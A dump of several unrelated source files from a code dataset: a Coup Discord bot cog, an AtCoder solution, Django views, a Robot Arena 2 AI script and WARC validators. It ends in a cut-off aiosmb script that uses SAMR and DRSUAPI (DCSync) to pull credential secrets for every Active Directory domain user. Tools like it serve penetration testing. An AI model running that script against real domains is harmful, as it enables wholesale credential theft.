ctx.send(embed=game.action.available_responses(ctx.channel.mention))\n\n @commands.command(name=\"coup\", help=COUP_HELP)\n @others_in_game(1, \"coup\")\n @has_enough_coins(actions.LaunchCoup.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def do_coup(self, ctx, user: User):\n '''\n Lets a player coup another player\n user: discord.User of player to coup\n '''\n # Get the game and other player\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n other_player = game.get_player(user.id)\n\n # Create and perform the Action\n game.action = actions.LaunchCoup(player, other_player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await user.send(embed=game.action.available_responses(ctx.channel.mention))\n\n # CHECK BEFORE EACH ACTION IF THE TURN / GAME IS OVER\n # (steal not included because it has a more specific check above)\n @exchange_cards.before_invoke\n async def pre_exchange_check(self, ctx):\n await self.pre_action_check(ctx)\n @take_tax.before_invoke\n async def pre_tax_check(self, ctx):\n await self.pre_action_check(ctx)\n @assassinate_player.before_invoke\n async def pre_assassination_check(self, ctx):\n await self.pre_action_check(ctx)\n @take_income.before_invoke\n async def pre_income_check(self, ctx):\n await self.pre_action_check(ctx)\n @take_foreign_aid.before_invoke\n async def pre_foreign_aid_check(self, ctx):\n await self.pre_action_check(ctx)\n @do_coup.before_invoke\n async def pre_coup_check(self, ctx):\n await self.pre_action_check(ctx)\n\n async def pre_action_check(self, ctx):\n '''\n After every ACTION command in this Cog, it will automatically check\n if the turn / game is over and advance the turn if necessary.\n '''\n # Make sure the game properly rotates the turn\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n await self._check_turn_rotation(ctx.channel, game, player)\n\n ################################## RESPONSE COMMANDS ###############################\n\n @commands.command(name=\"block\", help=BLOCK_HELP)\n @commands.check_any(is_stage(CoupGame.CHALLENGE1_STAGE), is_stage(CoupGame.RESPONSE_STAGE))\n @game_is_started()\n @is_player()\n @channel_has_game()\n @commands.guild_only()\n async def block_action(self, ctx, influence=\"auto-determine\"):\n '''\n Blocks another player's action from this turn\n influence: str, representing which influence the player is using to block\n '''\n # Get the players involved in the Reponse\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n player_to_block = game.action.done_by\n\n # Check if player is allowed to block player_to_block\n if not game.action.is_blockable():\n # action itself cannot be blocked\n await ctx.send(f\"{game.action.done_by.get_mention()}'s action is not blockable\")\n return\n elif not isinstance(game.action, actions.ForeignAid) and \\\n game.action.done_to is not player:\n # not foreign aid, so block must be by `done_to` player\n await ctx.send(f\"Only {game.action.done_to.get_mention()} is allowed to block\")\n return\n elif player is player_to_block:\n # tried to block self\n await ctx.send(\"You can't block yourself\")\n return\n\n # Auto determine the influence if necessary\n influence = influence.lower()\n if influence == \"auto-determine\":\n # automatically determine what influence they are using to block\n if isinstance(game.action, actions.Assassinate):\n # blocking assassination with Contessa\n influence = \"contessa\"\n elif isinstance(game.action, actions.ForeignAid):\n # blocking foreign aid with Duke\n influence = \"duke\"\n elif isinstance(game.action, actions.LaunchCoup):\n # blocking coup with Double Contessa\n influence = \"doublecontessa\"\n elif isinstance(game.action, actions.Steal):\n # blocking a steal with either Captain or Ambassador, but didn't specify\n await ctx.send(\"Please specify whether you are blocking with Captain or Ambassador\")\n return\n\n # Make sure the block is possible with the given card\n if not game.action.can_block_with(influence):\n await ctx.send(f\"`{influence.capitalize()}` is unable to block {player_to_block.get_mention()}'s action\")\n return\n\n # Convert the influence type into the correct Reponse class\n if influence == \"contessa\":\n response = responses.ContessaBlock(player, player_to_block)\n elif influence == \"captain\":\n response = responses.CaptainBlock(player, player_to_block)\n elif influence == \"ambassador\":\n response = responses.AmbassadorBlock(player, player_to_block)\n elif influence == \"duke\":\n response = responses.DukeBlock(player, player_to_block)\n elif influence == \"doublecontessa\":\n response = responses.DoubleContessaBlock(player, player_to_block)\n else:\n await ctx.send(\"\"\"```Please name a valid influence to block with:\n - contessa\n - captain\n - ambassador\n - duke\n - doublecontessa```\"\"\")\n return\n\n # Perform the block by undoing the action\n game.action.undo_action()\n\n # set the game's Response stage to the newly created response\n game.response = response\n await ctx.send(response.attempt_message())\n\n @commands.command(name=\"pass\", help=PASS_HELP)\n @commands.check_any(\n is_stage(CoupGame.CHALLENGE1_STAGE),\n is_stage(CoupGame.RESPONSE_STAGE),\n is_stage(CoupGame.CHALLENGE2_STAGE))\n @game_is_started()\n @is_player()\n @channel_has_game()\n @commands.guild_only()\n async def pass_response(self, ctx):\n '''\n Lets a player pass on responding, allowing the other\n player's Action or Response to go through successfully\n\n Done by action.done_to:\n - during `challenge1` stage, forcing through to `response` stage\n - during the `response` stage after some other player challenged and lost.\n Done by action.done_by:\n - during `challenge2` stage, allowing other player's Response to go through\n '''\n # Make sure `pass` is an option\n game = self.bot.get_game(ctx.channel.id)\n action = game.action\n if (action is None) or (not action.is_blockable()):\n # there was no choice between blocking / challenging and passing\n await ctx.send(\"Nothing to pass on\")\n return\n game_stage = game.get_stage()\n\n # done_to user responding\n if action.done_to is not None and ctx.author.id == action.done_to.get_id():\n # must be `challenge1` or `response` stage\n if game_stage == CoupGame.CHALLENGE1_STAGE or game_stage == CoupGame.RESPONSE_STAGE:\n # Allows the Action to complete unchecked (turn ends)\n game.response = responses.Pass(action.done_to, action.done_by)\n await ctx.send(game.response.attempt_message())\n else:\n return\n\n # done_by user responding to a Block\n elif ctx.author.id == action.done_by.get_id():\n # must be `challenge2` stage\n if game_stage == CoupGame.CHALLENGE2_STAGE:\n # Allows the (Block) Response to go through\n response = game.response\n game.challenge2 = responses.Pass(response.response_to, response.response_by)\n await ctx.send(game.challenge2.attempt_message())\n else:\n return\n\n # done by a general user\n else:\n await ctx.send(\"You are unable to pass\")\n return\n\n # Pass means the game is no longer pending\n game.pending = False\n\n @commands.command(name=\"challenge\", help=CHALLENGE_HELP)\n @exchange_time_up(False)\n @commands.check_any(is_stage(CoupGame.CHALLENGE1_STAGE), is_stage(CoupGame.CHALLENGE2_STAGE))\n @game_is_started()\n @is_player()\n @channel_has_game()\n @commands.guild_only()\n async def challenge_player(self, ctx):\n '''\n Challenges the last user who did an action\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n game_stage = game.get_stage()\n\n # Check which event is being challenged\n if game_stage == CoupGame.CHALLENGE1_STAGE:\n # challenging the Action\n if game.action.is_influence_power():\n player_to_challenge = game.action.done_by\n if ctx.author.id == player_to_challenge.get_id():\n # trying to challenge themself\n await ctx.send(\"You can't challenge yourself\")\n return\n\n # Create and carry out the challenge (automatically undoes the action)\n challenge = responses.Challenge(player, player_to_challenge)\n game.action.undo_action()\n await ctx.send(challenge.attempt_message())\n if game.action.done_to is not None and ctx.author.id == game.action.done_to.get_id():\n # user is responding with Challenge -> store as response\n game.response = challenge\n else:\n # general user challenging -> store as challenge1\n game.challenge1 = challenge\n await self.handle_challenge(ctx, game, game.action, challenge)\n else:\n await ctx.send(f\"Can't challenge {game.action.done_by.get_mention()}'s action\")\n return\n\n elif game_stage == CoupGame.CHALLENGE2_STAGE:\n # challenging the Response\n if game.response.is_influence_power():\n player_to_challenge = game.response.response_by\n if ctx.author.id == player_to_challenge.get_id():\n # trying to challenge themself\n await ctx.send(\"You can't challenge yourself\")\n return\n else:\n # create and carry out the Challenge\n game.challenge2 = responses.Challenge(player, player_to_challenge)\n await ctx.send(game.challenge2.attempt_message())\n await self.handle_challenge(ctx, game, game.response, game.challenge2)\n else:\n await ctx.send(f\"Can't challenge {game.response.response_by.get_mention()}'s action\")\n return\n\n async def handle_challenge(self, ctx, game, action, challenge):\n '''\n Handles the given challenge by checking the result\n ctx: Context to send results to\n game: CoupGame holding the game\n action: Action or Response being challenged\n challenge: Challenge that was issued\n '''\n challenged = challenge.response_to\n challenger = challenge.response_by\n if action.wins_challenge():\n # Action was valid (challenged player wins)\n await ctx.send(f\"{challenged.get_mention()} won the challenge!\")\n if isinstance(action, actions.Action):\n # person who made Action won; redo the action\n action.perform_action()\n # if isinstance(action, Response): don't do anything because action was already undone\n challenger.must_kill += 1\n\n # Automatically swap challenged_player's revealed card\n await self._handle_swap(ctx.channel, game, challenged, action, revealed=True)\n action.swapped = True\n else:\n # Action was a bluff (challenger wins)\n await ctx.send(f\"{challenger.get_mention()} won the challenge!\")\n if isinstance(action, actions.Action):\n pass\n # challenger won against person who made Action; undo the action\n # ACTION HAS ALREADY BEEN UNDONE\n if isinstance(action, responses.Response):\n # challenger won against person who made Response; redo action that had been blocked\n game.action.perform_action()\n\n challenged.must_kill += 1\n\n @commands.command(name=\"die\", help=DIE_HELP)\n @must_kill()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def select_death(self, ctx, *card_nums):\n '''\n Allows player to select their card to die\n card_num: int, representing the numerical index of their\n card they are choosing to let die (indexed from 0)\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Figure out which cards to kill\n try:\n card_indexes = {int(num) - 1 for num in card_nums}\n if len(card_indexes) != player.must_kill:\n # they aren't killing the correct number\n await ctx.send(f\"Need to kill `{player.must_kill}` cards, try again\")\n return\n for i in card_indexes:\n if not player[i].alive:\n # tried to kill a card that wasn't alive\n await ctx.send(f\"Card `{i + 1}` is not alive, try again\")\n return\n except:\n await ctx.send(f\"Card `{i + 1}` is not valid, try again\")\n return\n\n # Create and perform the action\n response = responses.Die(player, *card_indexes)\n response.perform_action()\n game.add_death(response)\n await ctx.send(response.complete_message())\n\n # Check if the player is eliminated\n if player.is_eliminated():\n await self.bot.process_player_remove(ctx.channel, game, player)\n await ctx.send(f\"{ctx.author.mention} was eliminated\")\n\n\n ############################## REMOVING PLAYERS FROM GAME ##############################\n\n @commands.command(name=\"kick\", help=KICK_HELP)\n @others_in_game(1, \"kick\") # checks that other player is part of game and not self\n @is_game_master()\n @channel_has_game()\n @commands.guild_only()\n async def kick_player(self, ctx, user: User):\n '''\n Allows the game master to kick a player from the game\n user: User to kick\n '''\n # Possible to kick player if checks are passed\n game = self.bot.get_game(ctx.channel.id)\n if game.is_active():\n player = game.get_player(user.id)\n\n # Kill their cards\n cards_killed = []\n for i in range(game.influences_per_player()):\n card = player[i]\n if card.alive:\n game.add_to_dead_pile(card.type)\n cards_killed.append(card.type.capitalize())\n if len(cards_killed) > 0:\n await ctx.send(f\"{user.mention}'s {', '.join(cards_killed)} was killed\")\n\n await self.bot.process_player_remove(ctx.channel, game, player)\n else:\n # game hasn't started yet\n game.unsign_up_player(user.id)\n self.bot.set_user_status(user.id, False)\n await ctx.send(f\"Removed {user.mention} from game\")\n\n @commands.command(name=\"forfeit\", help=FORFEIT_HELP)\n @is_player()\n @channel_has_game()\n @commands.guild_only()\n async def forfeit_game(self, ctx):\n '''\n Allows a user to forfeit from a game that has already started\n '''\n game = self.bot.get_game(ctx.channel.id)\n if not game.is_active():\n await ctx.send(f\"Please use `{self.bot.command_prefix}leave` to leave the game\")\n elif game.player_count() == 1:\n # Last player is leaving game; delete game\n self.bot.set_user_status(user.id, False)\n self.bot.remove_game(channel_id)\n await ctx.send(\"No players remain - game cancelled\")\n else:\n player = game.get_player(ctx.author.id)\n await ctx.send(ctx.author.mention + \" left the game\")\n\n # Kill their cards\n cards_killed = []\n for i in range(game.influences_per_player()):\n card = player[i]\n if card.alive:\n game.add_to_dead_pile(card.type)\n cards_killed.append(card.type.capitalize())\n if len(cards_killed) > 0:\n await ctx.send(f\"{ctx.author.mention}'s {', '.join(cards_killed)} was killed\")\n\n await self.bot.process_player_remove(ctx.channel, game, player)\n\n\n ################################# HELPER METHODS ###############################\n\n async def _prompt_response(self, channel, game):\n '''\n Helper method that prompts the player for their response to\n another player's move\n channel: discord.Channel to send response prompt in\n game: CoupGame object representing the game being played\n '''\n # Find what is being responded to\n if game.challenge2 is not None:\n responding_to = game.challenge2\n if game.response.wins_challenge():\n player = game.challenge2.response_by # player who challenged must respond\n else:\n player = game.challenge2.response_to # player who was challenged must respond\n elif game.response is not None:\n responding_to = game.response\n player = responding_to.response_to\n elif game.challenge1 is not None:\n responding_to = game.challenge1\n if game.action.wins_challenge():\n player = game.challenge1.response_by # player who challenged must respond\n else:\n player = game.challenge1.response_to # player who was challenged must respond\n elif game.action is not None:\n responding_to = game.action\n player = responding_to.done_to\n\n if not (responding_to.is_influence_power() or responding_to.is_blockable()):\n # Nothing to respond to\n return\n\n if player is None:\n # asking for general responses\n await channel.send(\n \"Waiting for general response ...\",\n embed=responding_to.available_responses(channel.mention))\n else:\n # asking user sepecifically\n await channel.send(f\"Waiting for {player.get_mention()}'s response ...\")\n await player.get_user().send(embed=responding_to.available_responses(channel.mention))\n\n async def _check_turn_rotation(self, channel, game, player):\n '''\n Checks the turn rotation. If the provided player is the current\n turn player, nothing happens. If the provided player is the\n next turn player, the game's previous turn must be finished up,\n and then updated for a new turn.\n channel: discord.Channel to send any messages to\n game: CoupGame object holding the game\n player: Player object holding the player who made a command\n Return: True if turn rotated, False otherwise\n '''\n if game.get_next_turn().get_id() == player.get_id():\n # player is from the next turn\n return await self._check_turn_over(channel, game, send_prompt=False)\n # was not their turn\n return False\n\n async def _check_turn_over(self, channel, game, *, advance_if_possible=True, send_prompt=True):\n '''\n Checks if the current turn is over for the given game. If the turn\n is over, it automatically wraps up the turn and advances it\n channel: discord.Channel where game is being played\n game: CoupGame representing the game\n advance_if_possible: bool, representing whether to advance the turn on the\n sole basis that it is \"possible\"\n send_prompt: bool, representing whether to send prompts after\n rotating the turn (defaults to False)\n Return: True if the turn was completed, and False otherwise\n '''\n if game.soft_pending and not advance_if_possible:\n # game is soft pending and don't need to advance if necessary\n if not game.hard_pending and game.action is not None:\n await channel.send(f\"Respond, or {game.get_next_turn().get_mention()} is next up\")\n return\n elif game.is_over():\n # Send the last turn summary\n await channel.send(embed=game.turn_summary())\n return\n elif game.hard_pending:\n # Send which specific players have pending moves\n await channel.send(embed=game.pending_players_embed())\n return False\n elif game.turn_can_complete():\n # Swap cards for any supers used\n await self._check_super_swaps(channel, game)\n\n # Send turn summary and advance to next turn\n await channel.send(embed=game.turn_summary())\n game.next_turn()\n if send_prompt:\n # Prompt user for their action\n await channel.send(f\"It is now {game.get_turn().get_mention()}'s turn\")\n await self.bot.prompt_action(channel)\n return True\n\n async def _check_game_over(self, channel, game):\n '''\n Checks if the given game is over. If it is over, sends the\n appropriate message to the game channel\n channel: discord.Channel to send game over message to\n game: CoupGame object representing game to check\n Return: True if the game was over, False otherwise\n '''\n # Check if the game is over\n if game.is_over():\n # game has a winner\n winner = game.get_winner()\n await channel.send(f\"Game over - {winner.get_mention()} was victorious 🎉\")\n self.bot.remove_game(channel.id)\n return True\n else:\n return False\n\n async def _check_super_swaps(self, channel, game):\n '''\n Checks if any automatic swaps need to happen. Only happens for\n cards that are \"supers\" (like Double Contessa)\n channel: Channel to send information to\n game: CoupGame to check swaps for\n '''\n # Check for swapping in the Action\n action = game.action\n if action is not None and action.is_super() and not action.swapped:\n # Action was a super and has not been swapped yet\n await self._handle_swap(channel, game, action.done_by, action, revealed=False)\n\n # Check for swapping in the Response\n response = game.response\n if response is not None and response.is_super() and not response.swapped:\n # Response was a super and has not been swapped yet\n await self._handle_swap(channel, game, response.response_by, response, revealed=False)\n\n async def _handle_swap(self, channel, game, player, action, *, revealed):\n '''\n Handles a card swap for the player in the given game, for the given action. The\n action informs the method which cards need to be swapped\n channel: Channel to send information to\n game: CoupGame for the game being played\n player: Player getting their cards swapped\n action: Action or Response that needs to be swapped for\n revealed: bool, whether the cards were revealed\n '''\n swapped_cards = game.swap_cards(player, action.REQUIRED_CARDS.copy()) # CardSwap object\n if revealed:\n card_text = swapped_cards.in_text()\n else:\n maybe_swapped = []\n for influence_type, num in action.REQUIRED_CARDS.items():\n for _ in range(num):\n maybe_swapped.append(influence_type.capitalize())\n card_text = f\"(maybe) `{'`, `'.join(maybe_swapped)}`\"\n await channel.send(f\"Swapped {player.get_mention()}'s revealed {card_text} for new cards\")\n await player.get_user().send(swapped_cards.summary_text())\n action.swapped = True\n\n\ndef setup(bot):\n bot.add_cog(GameCog(bot))\n","repo_name":"gavinvogt/coup-discord-bot","sub_path":"Coup Bot/cogs/game_cog.py","file_name":"game_cog.py","file_ext":"py","file_size_in_byte":36607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34250166122","text":"A, B, C, D, E, F, X = map(int, input().split())\n\nTakahashi = ([B] * A + [0] * C) * X\nAoki = ([E] * D + [0] * F) * X\n\ntotal_t = 0\ntotal_a = 0\nfor i in range(X):\n total_t += Takahashi[i]\n total_a += Aoki[i]\n\nif total_t > total_a:\n print(\"Takahashi\")\nelif total_t < total_a:\n print(\"Aoki\")\nelse:\n print(\"Draw\")\n","repo_name":"hy-sksem/AtCoder","sub_path":"ABC/abc249/a/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37302275019","text":"import subprocess\r\nfrom django.shortcuts import render, redirect\r\nimport requests\r\nimport json\r\nimport re\r\nimport os\r\nimport subprocess\r\n\r\n# Create your views here.\r\nendpoint = 'http://localhost:5000{}'\r\n\r\ndef index(request):\r\n if request.method == 'GET': \r\n url = endpoint.format('/datos') # http://localhost:5000/datos\r\n data = requests.get(url) # consulta a la API\r\n url = endpoint.format('/procesos') # http://localhost:5000/proceso\r\n cXml = requests.get(url)\r\n\r\n url = endpoint.format('/fechas')\r\n fBytes = requests.get(url)\r\n\r\n f = ''\r\n for f in fBytes:\r\n f = f.decode('utf-8')\r\n\r\n fechas = []\r\n while f != '':\r\n fecha = re.search(r'([0-2][0-9]|3[0-1])(\\/|-)(0[1-9]|1[0-2])\\2(\\d{4})', f).group()\r\n fechas.append(fecha)\r\n f = f.replace(fecha, '')\r\n\r\n context = {\r\n 'data': data.text,\r\n 'cXml': '',\r\n 'fechas': fechas,\r\n } \r\n\r\n if request.GET.get('bDatos') == '':\r\n context['cXml'] = cXml.text\r\n\r\n return render(request, 'index.html', context)\r\n\r\n\r\ndef carga(request):\r\n try:\r\n docs = request.FILES['document']\r\n except:\r\n return redirect('index')\r\n data = docs.read()\r\n url = endpoint.format('/datos')\r\n requests.post(url, data)\r\n return redirect('index')\r\n\r\n\r\ndef enviar(request):\r\n url = endpoint.format('/procesos')\r\n requests.post(url)\r\n return redirect('index')\r\n\r\n\r\ndef reset(request):\r\n url = endpoint.format('/reset')\r\n requests.post(url)\r\n return redirect('index')\r\n\r\n\r\ndef iva(request):\r\n if request.method == 'GET':\r\n selector = request.GET.get('selector')\r\n inferior = request.GET.get('inferior')\r\n superior = request.GET.get('superior')\r\n tipo = request.GET.get('tipo')\r\n url = endpoint.format('/grafica') # http://localhost:5000/datos\r\n grafica = requests.get(url, {\r\n 'selector': selector,\r\n 'inferior': inferior,\r\n 'superior': superior,\r\n 'tipo': tipo\r\n }) # consulta a la API\r\n\r\n context = json.loads(grafica.text)\r\n\r\n return render(request, 'graficas.html', context)\r\n\r\n\r\ndef documento(request):\r\n module_dir = os.path.dirname(__file__) # get current directory\r\n file_path = os.path.join(module_dir, '../../../DOCUMENTACION/[IPC2]ENSAYO_202000166.pdf')\r\n subprocess.Popen([file_path], shell=True)\r\n return redirect('index')\r\n\r\n\r\ndef pdf(request):\r\n module_dir = os.path.dirname(__file__) # get current directory\r\n file_path = os.path.join(module_dir, '../../flask/reporte.pdf')\r\n subprocess.Popen([file_path], shell=True)\r\n return redirect('index')\r\n\r\n\r\ndef regresar(request):\r\n return redirect('index')","repo_name":"Gerson7w7/IPC2_Proyecto3_202000166","sub_path":"PROYECTO3/frontend/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15229262135","text":"from __future__ import generators\nimport plus\nimport AI\nfrom AI import vector3\nimport Arenas\nimport Gooey\nimport math\nimport Tactics\n\nclass Frenzy(AI.SuperAI):\n \"Hammer strategy\"\n #Somehow like Whipper.py but is intended for special use on spin motor hammers (the only legal one being the geared Beta burst)\n #Self-rights with the hammer.\n #Note: To use only if the hammer uses spin motors, and it is NOT compatible with other weapons.\n #Use normal bindings, and wire the hammer with an analog control named \"Hammer\"\n\n name = \"Frenzy\"\n\n def __init__(self, **args):\n AI.SuperAI.__init__(self, **args)\n\n self.zone = \"weapon\"\n\n self.tactics.append(Tactics.Engage(self))\n\n self.whipTimer = 0\n self.whipDir = 1\n self.whipDirCount = 4\n\n self.whipFunction = self.WhipBackAndForth\n\n def Activate(self, active):\n if active:\n if AI.SuperAI.debugging:\n self.debug = Gooey.Plain(\"watch\", 0, 75, 100, 75)\n tbox = self.debug.addText(\"line0\", 0, 0, 100, 15)\n tbox.setText(\"Throttle\")\n tbox = self.debug.addText(\"line1\", 0, 15, 100, 15)\n tbox.setText(\"Turning\")\n tbox = self.debug.addText(\"line2\", 0, 30, 100, 15)\n tbox.setText(\"\")\n tbox = self.debug.addText(\"line3\", 0, 45, 100, 15)\n tbox.setText(\"\")\n\n self.RegisterSmartZone(self.zone, 1)\n else:\n # get rid of reference to self\n self.whipFunction = None\n\n return AI.SuperAI.Activate(self, active)\n\n def Tick(self):\n # fire weapon\n targets = []\n\n if self.weapons:\n targets = [x for x in self.sensors.itervalues() if x.contacts > 0 \\\n and not plus.isDefeated(x.robot)]\n\n bReturn = AI.SuperAI.Tick(self)\n\n # call this now so it takes place after other driving commands\n if self.whipFunction: self.whipFunction(len(targets) > 0)\n\n return bReturn\n\n def InvertHandler(self):\n # fire weapon once per second (until we're upright!)\n while 1:\n if self.whipDir > 0:\n self.Input(\"Hammer\", 0, -100)\n else:\n self.Input(\"Hammer\", 0, 100)\n\n self.whipDirCount -= 1\n if self.whipDirCount < 0:\n self.whipDirCount = 4\n self.whipDir = -self.whipDir\n\n self.whipTimer -= 1\n\n for i in range(0, 8):\n yield 0\n\n def WhipBackAndForth(self, bTarget):\n if bTarget: self.whipTimer = 8\n\n if self.whipTimer > 0:\n # Whip back and forth!\n if self.whipDir > 0:\n self.Input(\"Hammer\", 0, -100)\n else:\n self.Input(\"Hammer\", 0, 100)\n self.Throttle(0)\n\n self.whipDirCount -= 1\n if self.whipDirCount < 0:\n self.whipDirCount = 4\n self.whipDir = -self.whipDir\n\n self.whipTimer -= 1\n\n def LostComponent(self, id):\n # if we lose all our weapons, stop using the Engage tactic and switch to Shove\n if id in self.weapons: self.weapons.remove(id)\n\n if not self.weapons:\n tactic = [x for x in self.tactics if x.name == \"Engage\"]\n if len(tactic) > 0:\n self.tactics.remove(tactic[0])\n\n self.tactics.append(Tactics.Shove(self))\n self.tactics.append(Tactics.Charge(self))\n\n return AI.SuperAI.LostComponent(self, id)\n\n def DebugString(self, id, string):\n if self.debug:\n if id == 0: self.debug.get(\"line0\").setText(string)\n elif id == 1: self.debug.get(\"line1\").setText(string)\n elif id == 2: self.debug.get(\"line2\").setText(string)\n elif id == 3: self.debug.get(\"line3\").setText(string)\n\n def SmartZoneEvent(self, direction, id, robot, chassis):\n if id == 1:\n if robot == 0:\n self.Input(\"Hammer\", 0, -100)\n elif robot > 0:\n if direction == 1:\n AI.SuperAI.SmartZoneEvent(self, direction, id, robot, chassis)\n\n return True\n\nAI.register(Frenzy)\n","repo_name":"apanx/RA2_AI","sub_path":"Frenzy.py","file_name":"Frenzy.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"27977728962","text":"import gzip\nimport tempfile\n\nfrom ipt.validator.basevalidator import BaseValidator, Shell\n\n\nclass WarctoolsWARC(BaseValidator):\n\n \"\"\"Implements WARC file format validator using Internet Archives warctools\n validator.\n\n .. seealso:: https://github.com/internetarchive/warctools\n \"\"\"\n\n _supported_mimetypes = {\n 'application/warc': ['0.17', '0.18', '1.0']\n }\n\n def validate(self):\n\n shell = Shell(['warcvalid', self.fileinfo['filename']])\n\n if shell.returncode != 0:\n self.errors(\"Validation failed: returncode %s\" % shell.returncode)\n self.errors(shell.stderr)\n\n self.messages(shell.stdout)\n\n self._check_warc_version()\n\n def _check_warc_version(self):\n warc_fd = gzip.open(self.fileinfo['filename'])\n try:\n # First assume archive is compressed\n line = warc_fd.readline()\n except IOError:\n # Not compressed archive\n warc_fd.close()\n with open(self.fileinfo['filename'], 'r') as warc_fd:\n line = warc_fd.readline()\n except Exception as exception:\n # Compressed but corrupted gzip file\n self.errors(str(exception))\n return\n\n if \"WARC/%s\" % self.fileinfo['format']['version'] in line:\n self.messages(\"OK: WARC version good\")\n else:\n self.errors(\n \"File version check error, version %s \"\n \"not found from warc: %s\" % (self.fileinfo['format']['version'],\n line))\n\n\nclass WarctoolsARC(BaseValidator):\n\n _supported_mimetypes = {\n 'application/x-internet-archive': ['1.0', '1.1']\n }\n\n def validate(self):\n \"\"\"Validate ARC file by converting to WARC using Warctools' arc2warc\n converter.\"\"\"\n\n with tempfile.NamedTemporaryFile(prefix=\"ipt-warctools.\") as warcfile:\n shell = Shell(command=['arc2warc', self.fileinfo['filename']],\n output_file=warcfile)\n\n if shell.returncode != 0:\n self.errors(\"Validation failed: returncode %s\" %\n shell.returncode)\n self.errors(shell.stderr)\n\n self.messages(shell.stdout)\n","repo_name":"atenhunen/dpres-ipt","sub_path":"ipt/validator/warctools.py","file_name":"warctools.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"41131406698","text":"import asyncio\nimport logging\nimport json\n\nimport aiosmb\nfrom aiosmb.commons.smbcredential import SMBCredential\nfrom aiosmb.commons.smbtarget import SMBTarget\nfrom aiosmb.smbconnection import SMBConnection\nfrom aiosmb.commons.authenticator_builder import AuthenticatorBuilder\nfrom aiosmb.dcerpc.v5.transport.smbtransport import SMBTransport\nfrom aiosmb.dcerpc.v5.interfaces.drsuapimgr import SMBDRSUAPI\nfrom aiosmb.dcerpc.v5.interfaces.samrmgr import SMBSAMR\n\n\nasync def dcsync(connection_string, filename = None, target_domain = None, target_users = [], json_out = False):\n\ttarget = SMBTarget.from_connection_string(connection_string)\n\tcredential = SMBCredential.from_connection_string(connection_string)\n\tspneg = AuthenticatorBuilder.to_spnego_cred(credential, target)\n\t\n\tasync with SMBConnection(spneg, target) as connection: \n\t\tawait connection.login()\n\t\t\n\t\tasync with SMBSAMR(connection) as samr:\n\t\t\tlogging.debug('Connecting to SAMR')\n\t\t\ttry:\n\t\t\t\tawait samr.connect()\n\t\t\texcept Exception as e:\n\t\t\t\tloggign.exception('Failed to connect to SAMR')\n\t\t\t\n\t\t\n\t\t\tif target_domain is None:\n\t\t\t\tlogging.debug('No domain defined, fetching it from SAMR')\n\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\tlogging.debug('Fetching domains...')\n\t\t\t\tasync for domain in samr.list_domains():\n\t\t\t\t\tif target_domain is None: #using th first available\n\t\t\t\t\t\ttarget_domain = domain\n\t\t\t\t\tlogging.debug('Domain available: %s' % domain)\n\t\t\t\t\t\t\n\t\t\tlogging.debug('Using domain: %s' % target_domain)\n\t\t\tasync with SMBDRSUAPI(connection, target_domain) as drsuapi:\n\t\t\t\ttry:\n\t\t\t\t\tawait drsuapi.connect()\n\t\t\t\t\tawait drsuapi.open()\n\t\t\t\texcept:\n\t\t\t\t\tlogging.exception('Failed to connect to DRSUAPI!')\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif len(target_users) > 0:\n\t\t\t\t\tif filename is not None:\n\t\t\t\t\t\twith open(filename, 'w') as f:\n\t\t\t\t\t\t\tfor username in target_users:\n\t\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\t\tif json_out == True:\n\t\t\t\t\t\t\t\t\tf.write(json.dumps(secrets.to_dict()))\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tf.write(str(secrets))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor username in target_users:\n\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\tprint(str(secrets))\n\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tdomain_sid = await samr.get_domain_sid(target_domain)\n\t\t\t\t\tdomain_handle = await samr.open_domain(domain_sid)\n\t\t\t\t\tif filename is not None:\n\t\t\t\t\t\twith open(filename, 'w') as f:\n\t\t\t\t\t\t\tasync for username, user_sid in samr.list_domain_users(domain_handle):\n\t\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\t\tif json_out == True:\n\t\t\t\t\t\t\t\t\tf.write(json.dumps(secrets.to_dict()) + '\\r\\n')\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tf.write(str(secrets))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tasync for username, user_sid in samr.list_domain_users(domain_handle):\n\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\tprint(str(secrets))\n\n\tprint('Done!')\nif __name__ == '__main__':\n\timport argparse\n\t\n\t\n\t\n\tparser = argparse.ArgumentParser(description='Fetch all domain user credentials via DCSync (DRSUAPI)')\n\tparser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity, can be stacked')\n\tparser.add_argument('connection_string', help='connection string. Identifies the credential to be used and the target')\n\tparser.add_argument('-o', '--out-file', help='file to store the results in')\n\tparser.add_argument('-d', '--domain', default = None, help='Name of the domain to 